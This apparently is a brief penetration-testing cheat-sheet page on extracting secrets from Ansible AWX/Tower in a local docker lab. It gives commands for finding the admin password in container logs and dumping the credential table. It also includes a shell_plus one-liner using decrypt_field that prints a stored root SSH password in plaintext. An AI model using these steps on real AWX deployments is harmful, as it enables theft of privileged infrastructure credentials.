Linux - Ansible AWX / Tower

Check for admin password in the logs of tools container.

apt-kali :: ~/awx ‹24.4.0*› » docker container logs tools_awx_1 | grep -i "admin pass"                                                                                                                                                                                  
Admin password: gzFjwNsEioLewVfjELsV

List name and input from table main_credential. In this example I've done bare minimum where the database name is default awx and I've not set any password for authentication.

apt-kali :: ~/awx ‹24.4.0*› » docker exec -it tools_postgres_1 psql awx -c "SELECT name,inputs FROM main_credential;"                                                                                                                                                   
      name       |                                                                                                                                 inputs                                                                                                                                  
-----------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Demo Credential | {"username": "admin"}
 Ansible Galaxy  | {"url": "https://galaxy.ansible.com/"}
 ssh_localhost   | {"password": "$encrypted$UTF8$AESCBC$Z0FBQUFBQm1WeER4Y3FZbklUUUtIbEpFWGNaRk5IbDNvb2tEOWhrd01YU0NQZ0MyNm5QTkxWc0paVFJjWG82V29xSHl3SWpLLWQtQzZqcDZvcXdnUjQ3YjdiVlY0Q1FqTXhITlAxdnAtMkZ6a1h3S3BWY2VyNTA9", "username": "root", "become_method": "", "become_username": ""}
(3 rows)

Decrypt password / secret / ssh_key_data with a simple one-liner:

apt-kali :: ~/awx ‹24.4.0*› » docker exec -it tools_awx_1 awx-manage shell_plus --quiet-load -c 'from awx.main.utils import decrypt_field; name = Credential.objects.get(name="ssh_localhost"); print(decrypt_field(name, "username"), decrypt_field(name, "password"))'
root MyS3cr3TP455W0rrrD=)

Last updated